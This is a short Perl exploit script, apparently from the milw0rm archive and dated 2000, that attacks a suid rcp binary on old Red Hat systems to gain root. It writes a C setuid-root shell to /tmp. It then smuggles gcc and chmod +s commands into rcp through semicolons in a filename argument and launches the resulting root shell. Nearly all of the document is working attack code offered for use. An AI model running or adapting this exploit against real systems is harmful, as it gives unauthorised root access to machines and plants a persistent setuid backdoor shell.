#!/usr/bin/perl -w## exploits suid privledges on rcp# Not really tested th

1. #!/usr/bin/perl -w
2. #
3. # exploits suid privledges on rcp
4. # Not really tested this but hey
5. # works on redhat6.2
6. # not werk on freebsd4.1 stable
7. #
8. # bug discovered by
9. # Andrew Griffiths
10. #
11. # Exploit written by tlabs
12. # greetz to those that know me innit
13. #
14. # Please set your rcpfile
15. # this can be found by doing
16. #
17. # ls -alF `which rcp`
18. #
19. # have a lot of fun
20.  
21. $RCPFILE="/usr/bin/rcp" ;
22.  
23. # configure above innit
24.  
25. sub USAGE
26. {
27. print "$0\nWritten by Tlabs\n" ;
28. exit 0 ;
29. }
30.  
31. if ( ! -u "$RCPFILE" )
32. {
33. printf "rcp is not suid, quiting\n" ;
34. exit 0;
35. }
36.  
37. open(TEMP, ">>/tmp/shell.c")|| die "Something went wrong: $!" ;
38. printf TEMP "#include<unistd.h>\n#include<stdlib.h>\nint main()\n{" ;
39. printf TEMP " setuid(0);\n\tsetgid(0);\n\texecl(\"/bin/sh\",\"sh\",0);\n\treturn 0;\n}\n" ;
40. close(TEMP);
41. open(HMM, ">hey")|| die "Something went wrong: $!";
42. print HMM "Sploit written by tlabs, thanks to Andrew Griffiths for the bug report" ;
43. close(HMM);
44.  
45. system "rcp 'hey geezer; gcc -o /tmp/shell /tmp/shell.c;' localhost 2> /dev/null" ;
46. system "rcp 'hey geezer; chmod +s /tmp/shell;' localhost 2> /dev/null" ;
47. unlink("/tmp/shell.c");
48. unlink("hey");
49. unlink("geezer");
50. printf "Ok, too easy, we'll just launch a shell, lets hope shit went well, innit:)\n" ;
51.  
52. exec '/tmp/shell' ;
53.  
54.  
55. # milw0rm.com [2000-11-29]